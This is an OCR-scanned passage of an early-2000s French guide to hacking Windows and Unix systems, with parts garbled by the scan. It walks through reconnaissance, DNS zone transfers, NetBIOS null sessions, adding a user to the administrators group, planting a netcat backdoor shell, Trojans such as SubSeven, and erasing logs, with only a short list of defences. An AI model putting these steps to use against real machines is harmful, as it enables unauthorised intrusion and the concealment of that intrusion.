Reponse de 81.56.^H.^B : octets=32 tenps=120 ns ITL=125 






Statistiques Ping pour 81. 56. ^H. ^B: 

Paquets : enuoyes = 4, repus = 4. perdus = 0 (perte 0x>, 
Duree approxinatiue des boucles en nillisecondes : 
nininun = 110ns, naxinun = 120ns # noyenne = 112ns 






C:\>_ 
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traceroute et tracert : 



Traceroute (pour Linux) et tracert (pour Windows) permettent de tracer et suivre le 
chemin qu'a emprunter un paquet quelconque jusqu'au systeme cible. On peut aussi 
determiner la topologie d'un reseau. Normalement, la derniere adresse IP marquee 
doit etre celle du destinataire. Si 9a n'est pas le cas, un systeme filtrant est place avant 
le systeme du destinataire. 

traceroute utilise par defaut le protocole UDP pour l'envoi des paquets, il peut aussi 
utiliser le protocole ICMP. tracert lui fonctionne de maniere inverse a traceroute , 
car il utilise par defaut le protocole ICMP pour l'envoi des paquets et peut utiliser le 
protocole UDP. 



Astuces : affectez le port TCP 53 a vos paquets envoyes avec traceroute et tracert 
car ce port n'est generalement pas filtre par les systemes de filtrage de paquets (cf 
chapitre sur les murs par-feu) . 



Exemple 
d'utilisation 
de la 

commande 
tracert sous 
windows : 



ED Invite de commandes 




_|D|X 


Microsoft Windows 2000 [Uersion 5.00.2195] 
<C) Copyright 1985-1999 Microsoft Corp. 




K:\>tracert 81 


.56. 






Denomination de l'itineraire vers lns-pl9-8-81-56-^B-^B. adsl.proxad.net 
avec un maximum de 30 sauts : 


I 


1 70 ms 

2 60 ns 

3 50 ns 

4 60 ens 


71 ns 
60 ns 
60 ns 
70 ns 


60 ns 192.168.254.254 

60 ns th2-6k-l.routers.proxad.net [212.27.37.30] 

60 ns pl9-6k-l-a6.routers.proxad.net [213.228.3.8 

61 ns lns-pl9-8-a9.routers.proxad.net [212.27.32. 


170] 1 


5 120 ns 

m.mi 


120 ns 


141 ns lns-pl9-8-81-56-M-M.adsl.proxad.net [81 


.56 J 


Itineraire determine. 






C:\> 









Voici des utilitaires permettant de pinger et tracer des systemes : 



Norn du logiciel : 


TRIDCOMM 


OS vises : 


Tous les windows 


Licence : 


freeware 


Editeur ou Auteur : 




Le but du logiciel : 


Fournit un ping et un tracert sur 
fond de carte terrestre dans le but 
de savoir dans quel endroit est situe 
le systeme trace 
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Nom du logiciel : 


NEOTRACE EXPRESS 3.25 




OS vises : 


Tous le windows 


Licence : 


freeware 


Editeur ou Auteur : 




Le but du logiciel : 


Comme tridcomm, il permet de 
« tracer » une ip, un serveur, un pc... 
sur fond de carte terrestre. 






Nom du logiciel : 


PING PLOTTER 2.30.1 


OS vises : 


Tous les windows 


Licence : 


shareware 


Editeur ou Auteur : 




Le but du logiciel : 


11 a de tres bonnes fonctions que je 
vous laisse decouvrir, entre autre, il 
permet de tracer une ip, faire des 
lookup... 



les commandes Dos utiles aux hackers : 

PING 

syntaxe : ping [IP ou nom de l'hote] 
exemple : ping 208.24.96.12 
utilite : - Permet de savoir si un systeme est connecte 
permet d'obtenir des informations sur un systeme 

NETSTAT 

syntaxe : netstat 
exemple : netstat 
utilite : - Permet de connaitre des informations locales sur 

TCP/IP 

- obtenir l'IP d'une personne sous ICQ avec qui on a etabli 

une conversation 
Options : • -a : qui va nous montrer les connexions en 

cours et les ports. 
• -e : qui va nous renvoyer des informations Ethernet 
• -p x : nous renvoie les informations de connexions 
pour le port specific- a la place de x 
• -r : qui va nous renvoyer la table de routage 

(Tapez la commande help netstat pour connaitre les autres 

options ) 

NBTSTAT 

syntaxe : nbtstat -x [...] 
exemple : nbtstat -x ... 
utilite : - Permet de voir les informations sur les 
connexions TCP/IP du systeme cible utilisant NetBIOS 

- exploit netbios 
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(Tapez la commande help nbtstat pour connaitre les autres 

options ) 



NET VIEW 

syntaxe : net view [nom de la machine] 
exemple : net view KHALEL 
utilite : - permet de voir les ressources partagees de la 

machine cible. 



NET USE 

syntaxe : net use [nom de la machine] [lettre de la ressource^ 

exemple : net use KHALEL 
utilite : - permet de se connecter a la ressource partagee 

specif iee 

II y a bien sur d'autres commandes (comme arp, route, nslookup. . .)• 



finger : 

C'est un utilitaire qui permet d'obtenir des informations sur les utilisateurs d'un 
systeme. C'est aussi un protocole utilisant par defaut le port 79. 



messages d'erreur des serveurs : 

Lorsque vous naviguez sur Internet, vous avez deja du voir des messages du genre 
« Forbidden » ou autres. 
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'3 403 Forbidden - Microsoft Internet Explorer 






Fichier Edition Affichage Favoris Outils ? 






■4-1 Precedente (Q [j?! ^ -^Rechercher 1 Favoris ^Historique 


m m m & 




Adresse \&\ http://www. . | r il.net/st .:es/ 






Forbidden 






You don't have permission to access /services/ on this server. 






i\ 






&~\ Termine 




£ Internet 



Et bien ces genres de messages peuvent etre utiles aux pirates, car cela peut leur 

permettre de determiner le type et la version du serveur cible. 

Pour obtenir ces informations, vous pouvez amener le serveur a produire une erreur 

en mettant par exemple une adresse pointant vers un fichier n'existant pas. 

Faites marcher votre imagination et vous verrez que vous aurez des informations plus 

precises sur le serveur comme le chemin d'acces au repertoire « /cgi-bin/ » , le chemin 

d'acces au repertoire web. 

bannieres : 

Une banniere est un bloc de texte que Ton obtient lorsque Ton se connecte au port 
d'un systeme. Une banniere donne generalement le systeme d'exploitation, la version 
et le nom du serveur (si Ton se connecte sur un serveur situe sur la cible, comme un 
serveur FTP) . 

La meilleure parade serait de modifier la banniere, le port par defaut du service ou 
modifier 1' implementation de TCP/IP du systeme d'exploitation ou en emuler un autre 
a la place car c'est cette implementation qui est responsable de la determination du 
systeme d'exploitation. 
Pourquoi ? 

Parce que les systemes sont programmes par des personnes differentes qui n'ont pas la 
meme maniere de programmer. 
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transfert de zones : 



D'abord revoyons quelques notions de reseau, surtout celles qui concernent les 
serveurs DNS ( Domaine Name Server) . 

Un serveur DNS est un composant reseau qui est principalement charge de faire 
certaines resolutions pour faciliter la vie des hommes et des systemes. Generalement, 
les grosses entreprises possedent un serveur DNS voir plusieurs, charges de 
resolutions internes. 

Passons a un exemple pour mieux comprendre le travail des serveurs DNS. En 
premier, rappelez-vous que les noms d'hotes et les adresse IP sont unique au monde. 

Lorsque vous saisissez l'adresse d'un site web dans votre navigateur, votre requete est 
passee par un systeme de resolution de nom de domaine, qui l'a prise comme une 
requete de type A (qui consiste a resoudre un nom d'hote en adresse IP, car les 
ordinateurs ne comprennent que les chiffres) et vous renvoie la reponse qu'il a 
normalement recu des systemes DNS, ayant autorite sur le domaine recherche. 

Bon cela ne se passe peut-etre pas forcement ainsi, cela depend de plusieurs points 
comme votre configuration reseau . . . 

Avant de passer a la maniere dont les pirates exploitent les informations que traitent 
les DNS, nous allons etudier ensemble les differentes types de requetes que peuvent 
traiter les DNS, cette partie est tres importante car d'abord vous allez apprendre 
comment fonctionnent reellement les DNS et savoir sur quoi se base les pirates 
exploitant les mauvaises configurations de ces DNS. 



Les requetes 



Les requetes 


Buts 


A 


Permet de resoudre un nom d'hote en adresse 
IP. Pour cela, il vous faut le nom d'hote de la 
machine a resoudre et l'adresse du DNS ayant 
autorite sur la machine 


ANY 


Permet d'avoir tous les enregistrements qu'un 
serveur DNS a dans son cache a propos d'une 
machine particuliere. Pour cela, il vous faut le 

nom d'hote ou l'adresse IP de la machine 
cible et l'adresse du DNS ayant autorite sur la 
machine. 


AXFR 


Permet de faire un transfert de zone sur un 

DNS. 11 vous faut l'adresse du DNS 
autoritaire et le nom de domaine de la cible 
(ex : free.fr, sans le www.) 
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CNAME 
(Cannonical Name) 


Permet de resoudre le nom d'hote d'un 
systeme a partir d'un de ses alias. Pour cela, il 
vous faut l'adresse du DNS autoritaire et d'un 
des alias du systeme de la cible. 


HINFO 
(Host Info) 


Permet d' avoir la configuration (materielle et 
logiciel) du systeme cible. Pour cela, il vous 
faut l'adresse du DNS autoritaire et du 
systeme de la cible. 


MX 

(Mail exchange) 


Permet d'avoir l'adresse IP et le nom d'hote 
des machines utilisees pour l'acheminement 
du mail sur le nom de domaine de la cible. 
Pour cela, il vous faut l'adresse du DNS 
autoritaire et le nom de domaine de la cible. 


NS 

(Name Server) 


Permet d'avoir les adresses des machines 
(serveurs DNS) resolvant les noms d'hotes 
d'un domaine. Pour cela, il vous faut l'adresse 
du DNS autoritaire et le nom de domaine de 
la cible. 


PTR 
(Pointer) 


Permet de resoudre une adresse IP en nom 
d'hote. Pour cela , il vous faut l'adresse IP de 
la machine a resoudre et l'adresse du DNS 
autoritaire 


SOA 
(Start Of Autority) 


Permet de savoir l'adresse du DNS principal 
(generalement, c'est le premier serveur DNS 
du reseau). Pour cela, il vous faut l'adresse 
d'un des serveurs DNS du reseau. 



Un transfert de zones 

Lorsque un serveur DNS secondaire a besoin de mettre a jour ses enregistrements (ce 
sont les informations qu'un serveur DNS a dans son cache concernant les systemes 
sur lesquels il a autorite), il fait ce que l'on appelle un transfert de zone a partir du 
serveur DNS principal (qui a generalement autorite sur toutes les machines du 
reseau). Maintenant si un pirate faisait un transfert de zone a la place d'un serveur 
secondaire, il aurait sur son ecran toutes les informations concernant le reseau de sa 
cible sans scanner les machines du reseau et sans faire de recherches. 

Certains programmes qui permettent d'interroger un DNS vont demander de fournir 
des donnees comme le nom de domaine cible et le nom du DNS autoritaire du 
domaine (generalement le premier DNS du reseau cible) . 

Pour trouver ces informations, consulter une base donnees whois au sujet du domaine 
cible. 

Voici des logiciels permettant d'interroger les DNS : 
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DNS Expert 



File View Tools Help 



JJ © " J 

Analyze Zone DNS Query Ping Traceioute 



DNS Expert 

Your DNS Companion 



f 

Analyze Zone 



Ping Host 




DNS Query 




Trace Route to Host 



Nom du logiciel : 


DNS Expert 


OS vises : 


NT/95/98/2000 


Licence : 


demo 


Editeur ou Auteur : 


Men&Mice 


Le but du logiciel : 


Permet de faire des requetes DNS 



G rPing 2.0 



File Options Help On the Web 



ma 



! Bng ij Iface | Lookup | Local Info | About j 
HostName/IP Address 



Ping | 



Message Screen 




_ 



Nom du logiciel : 


rPing 


OS vises : 


Tous les windows 
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Licence : 


shareware 


Editeur ou Auteur : 




Le but du logiciel : 


Fournir tous les utilitaires utiles pour un 
reseau : ping, traceroute, lookup... 



IP Check - IP Scan 



Start 



End 




Results 



! 0 Running threads 



Options 



Timeout (ms) | 1500 
No. of threads | 5 
I - Show all response 



Hostname or IP Address: 
I 



IP Check - Port 



Response: 



Reset 



Scan 



II 1 1 1 II II' 1 M 

Hostname or IP Address: 
I 



Go 



Result: 



Hostname or IP address 



r 



Port range 



Start | " End 1 65535 



Options -— 
Timeout(ms) | 1000 

No. of threads | 5 
I - Show all responses 



Status 



Results 



0 Running threads 



Reset 



Scan 



Nom du logiciel : 


IPCHECK 


OS vises : 




Licence : 




Editeur ou Auteur : 




Le but du logiciel : 


11 fournit aussi les utilitaires comme 
lookup, ping, scanner de ports. . . 



Nom du logiciel : 



Tous les utilitaire dormant la possibilite 
de chercher avec lookup ou des utilitaires 
comme axfr, dig... 



cartographie : 

Cartographier un reseau va nous permettre d'obtenir la topologie du reseau et la 
localisation des elements du reseau. Les logiciels permettant de cartographier un 
reseau font partie des couteaux suisses de la boite a outils des administrateurs mais 
aussi des pirates car cela va leur permettre d'analyser et de surveiller les systemes du 
reseau. 
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Ces logiciels s'appellent generalement des Networks Mapper. 



File Page 



Cheops network User Interface 



Help 



Friends 




131 204 208 I 



207.230.72.26 



ginkcse 
dnioiatcse 
subnet27-i 0nl0ian.c$e 
phoebe cse 



207 230 72 8 



FT 



Bavea^roTtTclieoTs-ma'p^ 



Nom du logiciel : 


CHEOPS 


OS vises : 




Licence : 


Open Source 


Editeur ou Auteur : 


Mark Spencer 


Le but du logiciel : 


Cartographier un reseau et donner sous 
forme graphique les systemes du reseau. 
Fournit aussi un ping, tracert. . . 



les messages electroniques : 

Pour obtenir des informations comme l'adresse IP et les logiciels de messagerie de la 
cible, vous pouvez si vous connaissez son adresse de messagerie, lui envoyer un 
message electronique et lui demander de vous repondre (meme pour vous dire qu'il a 
bien recu votre message) . Car c'est le message qu'il vous a renvoye qui va vous 
permettre de determiner des informations recherchees (remonter de quelques lignes 
pour en reprendre connaissance) . 
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Les informations voulues sont situes dans les en-tete du message qu'il vous a 
renvoye, pour ne pas surcharger le livre je n'ai pas detailler ici la methode car elle est 
decrite dans le chapitre consacre aux messageries et aux cookies. 

recensement des systemes et des ressources partagees : 

Le recensement est une etape importante dans la recherche car c'est a ce moment que 
vous allez commencer a cibler vos attaques sur les points faibles du systeme. Nous 
allons voir dans cette partie les differentes techniques de recensement pour chaque 
systeme d'exploitation (Windows, Linux/Unix) . 

• Windows NT : 

A l'aide des commandes Dos 'net view ' et 'net use' , vous pouvez, respectivement, 
voir et acceder aux ressources partagees d'un systeme. 

Syntaxes : 

• C:\>net view /domain [:nom de domaine] : permet de 
recenser les systemes du domaine. 

• C : \>net view \ \nom_hote : permet de voir les ressources partagees 
d'un systeme. 

•C:\>net use \\IP_cible (ou nom d'hote) \IPC$ "" 
/user:"" : permet de se connecter aux ressources partagees avec une 
connexion nulle. 

• C:\>net use \\nom_hote\lettre_ressource : permet de se 
connecter a la ressource partagee non protegee du systeme. 

Vous pouvez aussi recenser les utilisateurs et les comptes sous Windows NT a l'aide 
de la commande nbtstat. 

Sous DOS il faut taper : 

c: WINDOWS nbtstat -A IP_de_la_victime 
Normalement vous aurez un true pared a ce qui suit si votre victime est en reseau: 

NetBIOS Remote Machine Name Table 
Name Type Status 



KHAALEL<0 0> UNIQUE Registered 
WORKGROUP <00> GROUPE Registered 
KHAALEL <03> UNIQUE Registered 
KHAALEL <20> UNIQUE Registered 
WORKGROUP <1E> GROUPE Registered 
MAC Address = 00-00-00-00-00-00 

Ici c'est la ligne avec le numero <20> qui nous interesse car la plupart du temps c'est 
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sur cette ligne que figure le nom de l'ordi (ici KHAALEL). Maintenant il faut editer 

un fichier lmhost avec: 



c: WINDOWS edit lmhosts 
Puis taper: 

IP de la victime KHAALEL (le nom se trouvant a la place) #PRE 

Ensuite tapez 

c: WINDOWS nbtstat -R 

Ensuite allez sous demarrer > rechercher > ordinateur inscrivez dans la case le nom 
de l'ordinateur cible. Cliquez sur le nom avec un click droit puis selectionnez ouvrir 

ou explorer. 

Vous pouvez faire un recensement des bannieres a l'aide de Telnet pour connaitre les 
services qui tournent sur le systeme cible. 



Voici une liste de programmes qui permettent de recenser des informations sur un 
systeme. 



Utilitaires 


Fonctions 


Nbtscan 


Permet de faire la commande nbtstat sur 
plusieurs IP et sans avoir a les retaper a 
chaque test. 


DumpACL 


Recense les ressources partagees sur le 
systeme cible . 
(www.somarsoft.com) 


getmac 


Permet d'obtenir l'adresse MAC de la cible. 


netviewx 


Permet d'obtenir les services et les systemes 
d'un domaine. 


nltest 




net view 


( voir plus haut pour plus d' informations ) 


NetBios Auditing Tool ( NAT) 


Scanner et balayeur NetBIOS 


netstat 


( voir plus haut pour plus d' informations ) 


nbtstat 


( voir plus haut pour plus d' informations ) 


NTPvK 


NT Ressource Kit. C'est un ensemble de 
petits utilitaires fournis par Microsoft et qui 
permettent des fois d'administrer un systeme 
a distance. Les pirates peuvent done l'utiliser 

pour obtenir certaines informations. 
( ftp://ftp.microsoft.com/bussys/winnt/winnt- 
public/reskit/ ) 


NTInfoScan 


Scanner de systemes a la recherche de 
services. 11 permet aussi d'obtenir des 
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informations sur les utilisateurs d'un systeme 
et sur NetBIOS. 
( http://www.cerberus- 
infosec.co.uk/ntinfoscan.shtml ) 


enum 


Permet de recenser des systemes par 
NetBIOS 


netcat 


Le celebre interpreteur de commandes dont 
on fera peut-etre la connaissance plus tard 



• Unix : 

Comme sous Windows, on peut recenser les ressources partagees et recenser les 
utilisateurs mais les commandes sont bien sur differentes. 

Pour recenser les ressources partagees, on peut utiliser la commande 'showmounf, et 
pour recenser les utilisateurs il faut utiliser la commande 'finger' . On peut aussi 
recenser les banniere grace a netcat. 



les divers scanners : 

Voici certains « protocoles » permettant de conventionner les techniques utilisees par 
les scanners de vulnerability . 

II y a CVE ( Common Vulnerabilities and Exposures ), CIDF ( Common Intrusion 
Detect Framework ), IETF/IDEF ( Intrusion Detection Exchange Format ) , 
IETF/ID WG ( Intrusion Detection Working Group ), IETF/Syslog ( Security Issues in 
Network Event Logging ), ICAT Metabase. 



Scanners payants 



Internet Scanner 
Database Scanner 
System Scanner 
Wireless Scanner 




de ISS (www.iss.net) 



Retina Network Security Scanner 
www.eeye.com ) 



de eeye ( 



Scanners gratuits 



Nessus 
Nmap 



de www.nessus.org 



-► de www.insecure.org 
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Infiltration, piratage et 
securisation des systemes 
d' exploitation 
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Windows 



Nous allons ensemble etudier les techniques de base de piratage de windows. Surtout 
les techniques que Ton peut faire a distance car c'est le principal acces qu'un pirate 
peut avoir sur un systeme windows. 

Pour savoir le systeme tournant sur un ordinateur, on peut utiliser nmap ou hping qui 
permettent de determiner le systeme d' exploitation et sa version. Pour pouvoir 
realiser cette identification les logiciels vont analyser l'implementation de TCP/ IP de 
la machine en scannant ses ports. Pourquoi ? Car chaque personne a sa maniere de 
programmer done a aussi sa maniere d'implementer la pile de protocole TCP/ IP sur 
un systeme d'exploitation. 

Pour que nmap et ses comperes ne puissent determiner avec certitude le systeme 
d'exploitation tournant sur votre ordinateur, il n'y a pas plusieurs solutions. La 
meilleure serait des changer les informations que les champs des paquets contiennent 
par le contenu des memes champs d'un paquet emis par un autre systeme. Les champs 
qu'il faut changer sont generalement : 

- le champs TTL 

- le champs TOS (Type Of Service) 

- le champs definissant la taille de le fenetre 

- DF et ACK 

Bien sur, seuls les systemes en Open Source peuvent nous permettre de changer cela, 
a moins que l'on sache patcher NT. 

II y a aussi une deuxieme methode qui consiste a modifier l'implementation de 
TCP/IP de votre systeme (en Open Source) par un autre que vous aurez creer ou en 
emulant celui d'un autre systeme. 

Cette petite explication du fingerprinting (prise d'empreintes du systeme 
d'exploitation a distance) n'a pas eu pour but de vous obliger a passer sous Linux. 
Mais analysez bien ce que l'open Source peut permettre de faire en connaissant le 
langage C. On pourrait avoir une meilleure securite et moins de problemes, et cela 
parce que l'on aurait facilement acces au code source du noyau. 

Maintenant passons au piratage et a la securisation du systeme d'exploitation de 
Microsoft. 

Pour recenser les services et les ressources partagees etant sous Windows, reportez- 
vous au chapitre sur les utilitaires et outils automatises. 

Ce chapitre va se diviser en quatres parties : 

attaque commune a tous les Windows 
infiltration et piratage de Windows 9x 
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infiltration et piratage de Windows NT 
autres ressources 



attaques communes a tous les Windows : 
chevaux de troie et autres : 

Les chevaux de troie sont des programmes infectant qui ont pour but de donner, a la 
personne qui vous la installee, le pouvoir de prendre le controle de votre systeme. Les 
chevaux de troie sont generalement constitues de deux parties : le client et le serveur. 

Le client va se connecter au serveur et ce dernier va effectuer ce que demande le 
client (cela depend des fonctions que propose le client) . 

Le serveur est installe sur le systeme cible, le client sur le systeme du pirate. 

Comme cheval de troie, il existe NetBus, SubSeven, Back Orifice... 



Swap mouse 



Start program 



Msg manager 



Screendump 



Get info 



Ho connection 



Seruer admin 


Host name IP: 


localhostj 


Ml 


Port: |12345 


Open CD-ROM 


|~ in internal: 


60 




About 


Add IP | 


Connect! | 


Show image 


Function delay: 


0 




Memo 


Del IP | 


Scan! 



Port Redirect 



Play sound 



App Redirect 



Server setup 



Exit Windows 



0 |0 
Mouse pos 



Control mouse 



Goto URL 



Send text 



Listen 



Key manager 



Active wnds 



Sound system 



File manager 
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EditServerfor Sub7 2.1 



server: | 



startup method[s] 



□ registry-Run 



browse 



HWIN.INI 



□ registry -RunServices □ less known method 



9 □ not_ known method 



key name: |WinLoader | y u _noi_ 



notification options 



victim name: 

□ enable ICQ notityto UIN: 

□ enable IRC notify. ? notifyto: 
ire server: 

□ enable e-mail notify. ? notifyto: 




I 



II 



read current settings 



installation 



change server icon 



□ automatically start server on port: 
□ use random port 9 



□ server password: | | reenter: [_ 

□ protect server port and password 

□ enable IRC BOT BOT settings 
server name: * use random name 

specify a filename: 

□ melt server after installation 

□ enable fake error message: configure 

□ bind server with EXE file: 9 




protect server 


□ protect the server so it cant be edited/changed ? password: 


reenter: 


0 closeEditServer after savina or uodatina settinas *note: ifvou have problems ooeninci the server click here 


save new settings save a new copy of the server with the new settings | 


quit without saving 



Certains, doivent se poser une question du genre : « les logiciels d'administration a 
distance sont alors de chevaux de troie ? » 
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Oui, les logiciels d'administration des PC a distance peuvent aussi etre des chevaux 
de troie, cela depend de la maniere dont ils sont utilises. 

Passons maintenant a une autre forme de logiciels : les keyloggers. 

Ce sont des logiciels qui vont nous permettre de savoir tous les caracteres tapez sur le 
clavier de l'ordinateur cible mais aussi ce qu'a fait la cible depuis l'activation du 
programme. 

les attaques Dos et DDoS : 

Des attaques de type refus de services ou encore les attaques de type buffer overflow 
a distance peuvent etre utilisees pour faire planter un systeme equipe de Windows. 

Pour plus informations sur les attaques Dos et DDoS, allez au chapitre consacre a ce 
sujet. 

Autres : 

On peut aussi utiliser les techniques de cracking de mot de passe decrites au chapitre 
traitant du sujet. 

infiltration et piratage de Windows 9x : 

Dans la premiere partie de ce chapitre, nous avons pratiquement fait le tour les 
techniques de base de piratage de Windows 9x. 

Nous allons quand meme voir une technique tres utilisee par les virus et les chevaux 
de troie : Installation dans des repertoires specifiques pour etre lance au demarrage 
suivant. Pour faire cela, les createurs de virus ou propagateurs installent leur virus 
dans le repertoire : 

C:\Repertoire windows\Start Menu\Programs\Start 
ou dans les cles de la base de registre. 

On peut aussi inspecter les differents repertoires systemes de la cible pour y recolter 
des informations. 

Pour finir, il y a aussi l'exploit NetBIOS. 

infiltration et piratage de Windows NT : 
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lophtcrak : 

Ce programme permet de craquer les mots de passe du systeme (de fichiers Sam) . 
Pour cela, referez-vous au chapitre sur le piratage de mots de passe. 
Lophtcrack a aussi des fonctions de capture de mots de passe (du sniffing en faite) 
dans des reseaux de systemes sous Windows. Cette option s'appelle « SMB Relay ». 
II y a sur Internet plein de tutoriaux sur l'utilisation de lophtcrack. 

une petite recherche : 

Pour obtenir des informations sensibles sur le systeme, on va devoir parcourir les 
repertoires systemes et les cles de la base de registre. 

Exemple : les cles HLM\SECURITY\Policy\Secrets contiennent des informations 
sensibles comme des mots de passe haches. . . 

les comptes par defaut : 

Les systemes bases sur un noyau NT ont tous des comptes par defaut qui sont 
generalement utilises par les services de maintenance, et pour plein d'autres activites. 
Pour savoir quels sont les noms de ses comptes, vous pouvez installer Windows NT 
ou XP et : 

soit voir les comptes du systeme dans les cles de la base de registre 
soit faire un clic droit sur l'icone du poste travail puis cliquez sur 
proprietes puis chercher parmi les onglet des informations sur les 
utilisateurs du systeme. 

On peut aussi faire un tour sur le site de Microsoft. 

Apres avoir recupere les logins et les eventuelles mot de passe de ses comptes, nous 
allons pouvoir nous connecter au systeme avec des pouvoirs pratiquement egaux a 
ceux de l'administrateur. 



appartenir a un bon groupe : 

Le reve tout pirate, appartenir au groupe des administrateurs ou d'autres groupes 
ayant des droits plutot eleves. Et bien cela est possible grace a des commandes DOS 
mais aussi a certains logiciels : 

net localgroup administrator <user> /add : permet 

d'aj outer un utilisateur au groupe des administrateurs. 

le logiciel getadmin permet aussi d'aj outer un utilisateur au groupe 

des administrateurs. 
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il doit y avoir beaucoup d' exploits sur Internet qui permettent 
d'appartenir a des groupes ayant des droits eleves ou d'executer des 
commandes avec des droits eleves. 



un interpreteur de commande : 

Comme pour linux, on peut obtenir un interpreteur de commandes du systeme 
Windows pour y executer ce que Ton veut. 

Mais qu'est-ce qu'un interpreteur de commandes ? 

C'est une interface logicielle en mode texte qui nous permet de prendre le controle de 
notre systeme : cela correspond en gros a la invite de commandes DOS. 

Maintenant, voyons comment un pirate va pouvoir se procurer l'interpreteur de 
commandes du systeme. 

Pour notre exemple, on va s'interesser tout particulierement a l'interpreteur « Remote 

Command Line » (remote.exe) de NT. Sachez qu'il y a aussi « Remote Command 
Service » (rcmdsvc.exe) . 

Pour pouvoir realiser l'attaque du pirate NT, il va nous falloir netcat, on s'arrangera 
pour faire installer un espion netcat sur le systeme de la cible. 

Netcat est une application qui a de multiples fonctions interessantes est importantes, 
c'est un programme a double tranchant car, il peut etre aussi bien utilise par un 
administrateur reseau que par un pirate. 

Pour connaitre toutes les facettes de netcat, referez-vous a son fichier d'aide. 

Pour cette attaque, on a seulement besoin de configurer un espion netcat pour qu'il 
ecoute un port du systeme cible en attente d'une connexion. 
Nous allons aussi devoir configurer 1' espion pour qu'il renvoie l'interpreteur de 
commande (remote.exe) des qu'il detecte une connexion sur le port. 

On se connecte aux espions netcat a l'aide de netcat. 



exploits : 

On peut trouver plusieurs exploits sur Internet qui vont nous permettre d'accomplir 
des attaques sur le systeme ou de contourner certaines protections de l'administrateur 
ou du noyau. 

effacer ses traces : 
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II y a plusieurs manieres d'effacer ses traces sous NT apres s'y etre influxes : cela peut 
aller de la suppression du contenu des fichiers logs manuellement ou a l'aide de 
logiciels jusqu'a la creation et l'installation de rootkits pour NT en passant par la 
modification des attributs des fichiers que Ton aurait pu cacher et a l'ajout 
d'information et d'utilitaires dans les fichiers. 

Cette derniere technique est realisable en utilisant un flux de fichiers fournis par 
NTFS, pour plus informations sur cette technique, faites une recherche sur les failles 
du systeme de fichiers NTFS et sur les utilitaires POSIX cp de Windows. Le must 
serait de lire un guide d' administration sous NT. 



autres ressources 
RUNDLL32.EXE 

Microsoft a implements un utilitaire appele rundll32 . exe qui permet d'executer 
les fonctions d'une dll sans avoir a creer un programme complexe ou non. 

Le seul probleme avec ce programme est qu'il n'execute pas les fonctions des APIs 
Win32. 

Voici la syntaxe de rundll32.exe : 

rundll32.exe [nom dll], [fonction] [options] 



Les fichiers INF 

Les fichiers INF sont des fichiers qui offrent la possibilite de faire diverses 
manipulations sur un systeme equipe de Windows. Cela va de l'installation d'un 
programme (qui peut meme se faire sans l'accord de l'utilisateur) a l'ajout de donnees 
(entrees) dans la base de registre. 

Nous n'allons pas voir comment creer les fichiers INF mais seulement leur 
constitution car cela depasse le cadre de ce livre. 

Les fichiers INF sont des fichiers textes qui contiennent diverses sections. Chaque 
section a une tache particuliere. 



Pour information, il existe beaucoup de sections : un peu plus d'un dizaine. 



Voici comment se compose une section : 

[nomsection] 
instructions a executer 
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En premier, on specifie le nom de la section pour que le fichier sache comment traiter 
les instructions a executer. 

Exemple : 

[Def aultlnstall] 
CopyFiles = CopyFiles 

[CopyFiles] 
programme . exe 

Cet extrait de fichier INF va installer (s'il est execute) le programme 

« programme . exe » dans le repertoire choisi precedemment par le createur du 

fichier. 

Conclusion : 

Nous venons de voir des fichiers qui sont souvent utilises lors de 1' administration de 
systemes ou pour d'autres actions. 

lis peuvent entre autre permettre a un pirate d' installer un virus ou des codes 
malfaisants sur votre systeme sans votre accord (ce qui est possible en associant ces 
fichiers a des failles web qui permettent d'ecrire des fichiers sur l'ordinateur de 
Pinternaute : cf les failles ActiveX). 

Pour plus d' informations sur les fichiers INF, certains sites web traitent de leur 
creation mais aussi des livres de programmation et d' administration sous Windows. 



Les APIs Win32 

Les APIs Win32 sont des fonctions permettant d'interagir aisement avec le systeme 
d' exploitation. Elles permettent de faire diverses actions. Elles sont declarees dans 
des DLL et sont done utilisables par tous les languages de programmation 
fonctionnant sous Windows (Delphi, C++, Visual Basic...). 

La connaissance de ces APIs est un gros plus pour les pirates de systemes Windows. 



Voici 3 de ces fonctions (choisies au hasard): 



Bibliotheque : 


user32.dll 


Son but : 


permet de deconnecter l'utilisateur courant apres avoir mis fin aux 
applications que ce dernier aurait lance. 


Syntaxe : 


BOOL ExitWindow (DWORD dwReserved, UINT uReserved) 


Description : 


Les 2 parametres doivent etre mis a 0. 

Si l'execution de la fonction s'est deroulee avec succes, cette 
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derniere renvoie TRUE, dans le cas contraire FALSE. 



Bibliotheque : 


kernel32.dll 


Son but : 


Permet d'obtenir le nom de l'ordinateur. 


Syntaxe : 


LPTSTR GetComputerName (LPTSTR IpszName, LPDWORD 
lpdwcBuffer) 


Description : 


- LPTSTR IpszName: est un pointeur vers l'espace memo ire 
(variable ou tableau de caracteres) qui va contenir le nom 
fourni par la fonction. 

- LPDWORD lpdwcBuffer : taille de l'espace memoire. 

Si l'execution de la fonction s'est deroulee avec succes, cette 
derniere renvoie TRUE, dans le cas contraire FALSE. 




Bibliotheque : 


kernel32.dll 


Son but : 


Permet d'obtenir le nom du repertoire courant. 


Syntaxe : 


DWORD GetCurrentDirectory (DWORD dwCurDir, LPTSTR 
IpszCurDir) 


Description : 


- DWORD dwCurDir : taille de l'espace memo ire qui va contenir 
le nom du repertoire courant. 

- LPTSTR IpszCurDir : pointeur vers l'espace memoire qui va 
contenir le nom du repertoire courant. 

Si l'execution de la fonction s'est deroulee avec succes, cette 
derniere renvoie le nombre de caracteres obtenus, dans le cas 
contraire la valeur 0. 



Parades : 

Installez un jeu le fichier log dans des repertoires anodins pour que les 
pirates ne puissent les modifier tous. 
Installez tous les patchs de securite pour NT 

- Analysez chaque port de son systeme quitte a les desactiver 

- Verifiez regulierement chaque groupe 

Ne pas permettre au simple utilisateur d'installer des programmes 
Supprimez ou affectez un mot de passe aux comptes par defaut 
Bloquez faeces a la base de registre aux utilisateurs devant avoir des 
pouvoirs limites 

Mettez un mot de passe aux ressources partagees 

Partagez vos lecteurs et vos imprimantes que si vous en avez vraiment 

besoin car le partage est a la base de la plupart des failles de Windows 

Installez des programmes anti-troyens comme Bouffe-troyen, The 

cleaner... 

Scannez vos ports et analysez ce qui s'y passent. 
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Unix/Linux 



techniques de piratage de base : 
failles connues : 

Pour penetrer un systeme et avoir des droits eleves sur ce dernier, les pirates utilisent 
generalement des exploit (codes d'attaque rediges par d'autre hackers) servant a 
pirater une faille specifique dun systeme ou dun service. L'utilisation de ces exploits 
demande quand meme quelques connaissances sur le systeme vise (services tournant 
en tache de fond...) . 

Apres avoir recupere assez d' informations sur le systeme cible, ils vont devoir faire 
des recherches sur Internet pour trouver le bon exploit. 



